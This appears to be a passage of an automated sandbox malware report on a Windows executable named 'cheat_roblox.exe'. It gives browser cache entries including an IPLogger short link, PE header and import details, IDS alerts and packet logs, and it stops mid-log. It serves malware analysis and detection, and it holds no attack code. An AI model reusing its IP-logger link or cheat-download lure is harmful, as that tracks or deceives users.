                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                Malicious:false
                                                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                                Chrome Cache Entry: 71

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):9909
                                                                                                                Entropy (8bit):5.405067042408774
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:DLlw+00cv13xV1cSHYu+zogDCIIhWp6psOsW4rqSxVEGV5R2WxSi1yz:D5w+Pcv13T1FH0fuIIm6QXxVP20u
                                                                                                                MD5:973A7FCA114110C1817ACA6D5B7CD16E
                                                                                                                SHA1:8ED382EAF809679D595A656547889BA7CAEB6BBA
                                                                                                                SHA-256:4BE9B1FFA53ACDAAB23D678B783DA03465206477BBF4B362B3996E9A8D220B04
                                                                                                                SHA-512:10F3D38E3F85B565A12EAC3B4783476781B4184FE7FF4D8680058FE1ABC647ED3881A3DFBC8FE4F598DCC340084EBD7AA86E7F997DE1AEBDF915B0E88495E7E9
                                                                                                                Malicious:false
                                                                                                                URL:https://2no.co/24RXx6
                                                                                                                Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"

                                                                                                                Chrome Cache Entry: 72

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):445
                                                                                                                Entropy (8bit):7.051559084988302
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                                Malicious:false
                                                                                                                URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069
                                                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                                                                Chrome Cache Entry: 73

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                                Category:dropped
                                                                                                                Size (bytes):445
                                                                                                                Entropy (8bit):7.051559084988302
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                                Malicious:false
                                                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):7.909822900338073
                                                                                                                TrID:
                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:cheat_roblox.exe
                                                                                                                File size:2'675'335 bytes
                                                                                                                MD5:d49b1a211ce49bed3e766471501819c6
                                                                                                                SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
                                                                                                                SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
                                                                                                                SHA512:2a0ec111c39ed2d5e02555a18a94f84bb546d1fc4f827ddeb24709b9b86259318611626a578918c5d8e60a5667e774c0d36241b6b668afb466a8806d37c2b7d2
                                                                                                                SSDEEP:49152:1Djlabwz97DQNxlq9fFQXLkL9g+/kW/4JNe0OL108Jgwya3fj8kSbn17:Zqw5skLZbaWL108JgwnvS5
                                                                                                                TLSH:48C5120AF3A509F8E073E57889474906F67A3C1A13319BCF13A5556B2F673A1CE2E352
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                                                                                                File Icon

                                                                                                                Icon Hash:1515d4d4442f2d2d

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x140032ee0
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x140000000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:2
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:2
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:2
                                                                                                                Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                dec eax
                                                                                                                sub esp, 28h
                                                                                                                call 00007F23E4EE5C18h
                                                                                                                dec eax
                                                                                                                add esp, 28h
                                                                                                                jmp 00007F23E4EE55AFh
                                                                                                                int3
                                                                                                                int3
                                                                                                                dec eax
                                                                                                                mov eax, esp
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+08h], ebx
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+10h], ebp
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+18h], esi
                                                                                                                dec eax
                                                                                                                mov dword ptr [eax+20h], edi
                                                                                                                inc ecx
                                                                                                                push esi
                                                                                                                dec eax
                                                                                                                sub esp, 20h
                                                                                                                dec ebp
                                                                                                                mov edx, dword ptr [ecx+38h]
                                                                                                                dec eax
                                                                                                                mov esi, edx
                                                                                                                dec ebp
                                                                                                                mov esi, eax
                                                                                                                dec eax
                                                                                                                mov ebp, ecx
                                                                                                                dec ecx
                                                                                                                mov edx, ecx
                                                                                                                dec eax
                                                                                                                mov ecx, esi
                                                                                                                dec ecx
                                                                                                                mov edi, ecx
                                                                                                                inc ecx
                                                                                                                mov ebx, dword ptr [edx]
                                                                                                                dec eax
                                                                                                                shl ebx, 04h
                                                                                                                dec ecx
                                                                                                                add ebx, edx
                                                                                                                dec esp
                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                call 00007F23E4EE4A33h
                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                and al, 66h
                                                                                                                neg al
                                                                                                                mov eax, 00000001h
                                                                                                                sbb edx, edx
                                                                                                                neg edx
                                                                                                                add edx, eax
                                                                                                                test dword ptr [ebx+04h], edx
                                                                                                                je 00007F23E4EE5743h
                                                                                                                dec esp
                                                                                                                mov ecx, edi
                                                                                                                dec ebp
                                                                                                                mov eax, esi
                                                                                                                dec eax
                                                                                                                mov edx, esi
                                                                                                                dec eax
                                                                                                                mov ecx, ebp
                                                                                                                call 00007F23E4EE7757h
                                                                                                                dec eax
                                                                                                                mov ebx, dword ptr [esp+30h]
                                                                                                                dec eax
                                                                                                                mov ebp, dword ptr [esp+38h]
                                                                                                                dec eax
                                                                                                                mov esi, dword ptr [esp+40h]
                                                                                                                dec eax
                                                                                                                mov edi, dword ptr [esp+48h]
                                                                                                                dec eax
                                                                                                                add esp, 20h
                                                                                                                inc ecx
                                                                                                                pop esi
                                                                                                                ret
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                dec eax
                                                                                                                sub esp, 48h
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [esp+20h]
                                                                                                                call 00007F23E4ED3FC3h
                                                                                                                dec eax
                                                                                                                lea edx, dword ptr [00025747h]
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [esp+20h]
                                                                                                                call 00007F23E4EE6812h
                                                                                                                int3
                                                                                                                jmp 00007F23E4EEC9F4h
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe3bc.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x700000xe3bc0xe4001b279dad3e3d77fcdfb269a130bf474bFalse0.6334121436403509data6.778407783727912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                PNG0x706740xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                                                PNG0x711bc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                                                RT_ICON0x727680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                                                RT_ICON0x72cd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                                                RT_ICON0x735780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                                                RT_ICON0x744200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                                                RT_ICON0x748880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                                                RT_ICON0x759300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                                                RT_ICON0x77ed80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                                                RT_DIALOG0x7bc4c0x2badata0.5286532951289399
                                                                                                                RT_DIALOG0x7bf080x13adata0.6560509554140127
                                                                                                                RT_DIALOG0x7c0440xf2data0.71900826446281
                                                                                                                RT_DIALOG0x7c1380x14adata0.6
                                                                                                                RT_DIALOG0x7c2840x314data0.47588832487309646
                                                                                                                RT_DIALOG0x7c5980x24adata0.6279863481228669
                                                                                                                RT_STRING0x7c7e40x1fcdata0.421259842519685
                                                                                                                RT_STRING0x7c9e00x246data0.41924398625429554
                                                                                                                RT_STRING0x7cc280x1a6data0.514218009478673
                                                                                                                RT_STRING0x7cdd00xdcdata0.65
                                                                                                                RT_STRING0x7ceac0x470data0.3873239436619718
                                                                                                                RT_STRING0x7d31c0x164data0.5056179775280899
                                                                                                                RT_STRING0x7d4800x110data0.5772058823529411
                                                                                                                RT_STRING0x7d5900x158data0.4563953488372093
                                                                                                                RT_STRING0x7d6e80xe8data0.5948275862068966
                                                                                                                RT_STRING0x7d7d00x1c6data0.5242290748898678
                                                                                                                RT_STRING0x7d9980x268data0.4837662337662338
                                                                                                                RT_GROUP_ICON0x7dc000x68data0.7019230769230769
                                                                                                                RT_MANIFEST0x7dc680x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                                                2024-07-30T00:49:18.443625+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973220.114.59.183192.168.2.9
                                                                                                                2024-07-30T00:49:42.483073+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436112340.127.169.103192.168.2.9
                                                                                                                2024-07-30T00:49:41.144546+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436112240.127.169.103192.168.2.9

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jul 30, 2024 00:48:54.921684027 CEST49677443192.168.2.920.189.173.11
                                                                                                                Jul 30, 2024 00:48:55.233802080 CEST49677443192.168.2.920.189.173.11
                                                                                                                Jul 30, 2024 00:48:55.843199015 CEST49677443192.168.2.920.189.173.11
                                                                                                                Jul 30, 2024 00:48:55.858829021 CEST49673443192.168.2.9204.79.197.203
                                                                                                                Jul 30, 2024 00:48:56.671329975 CEST49676443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:48:56.674578905 CEST49675443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:48:56.968183041 CEST49674443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:48:57.046304941 CEST49677443192.168.2.920.189.173.11
                                                                                                                Jul 30, 2024 00:48:59.452524900 CEST49677443192.168.2.920.189.173.11
                                                                                                                Jul 30, 2024 00:49:01.750956059 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:01.751002073 CEST44349708128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:01.751090050 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:01.762448072 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:01.762466908 CEST44349708128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.519165039 CEST44349708128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.520347118 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:02.520373106 CEST44349708128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.521924019 CEST44349708128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.522001982 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:02.524569988 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:02.524736881 CEST44349708128.116.21.4192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.524741888 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:02.524799109 CEST49708443192.168.2.9128.116.21.4
                                                                                                                Jul 30, 2024 00:49:02.602380037 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:02.602418900 CEST4434971199.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.602483988 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:02.604423046 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:02.604443073 CEST4434971199.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:03.379829884 CEST4434971199.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:03.383378029 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.383407116 CEST4434971199.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:03.385015965 CEST4434971199.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:03.385092020 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.386687040 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.386902094 CEST4434971199.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:03.386955023 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.398300886 CEST49711443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.500745058 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.500793934 CEST4434971299.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:03.500874996 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.501563072 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:03.501575947 CEST4434971299.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:04.265136003 CEST49677443192.168.2.920.189.173.11
                                                                                                                Jul 30, 2024 00:49:05.302228928 CEST4434971299.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:05.303419113 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.303438902 CEST4434971299.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:05.304955006 CEST4434971299.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:05.305108070 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.305859089 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.306020021 CEST4434971299.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:05.306092024 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.312160969 CEST49712443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.416527987 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.416569948 CEST4434971599.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:05.416690111 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.418431997 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:05.418447971 CEST4434971599.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:05.462130070 CEST49673443192.168.2.9204.79.197.203
                                                                                                                Jul 30, 2024 00:49:06.163001060 CEST4434971599.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:06.163455963 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:06.163475990 CEST4434971599.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:06.164547920 CEST4434971599.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:06.164623022 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:06.166629076 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:06.166727066 CEST49715443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:06.276109934 CEST49676443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:06.276124954 CEST49675443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:06.580159903 CEST49674443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:08.309634924 CEST4434970423.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:08.309734106 CEST49704443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:12.516150951 CEST49716443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:12.516268969 CEST4434971699.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:12.516369104 CEST49716443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:12.525295973 CEST49716443192.168.2.999.86.4.125
                                                                                                                Jul 30, 2024 00:49:12.525337934 CEST4434971699.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:13.264359951 CEST4434971699.86.4.125192.168.2.9
                                                                                                                Jul 30, 2024 00:49:13.265362024 CEST49716443192.168.2.999.86.4.125
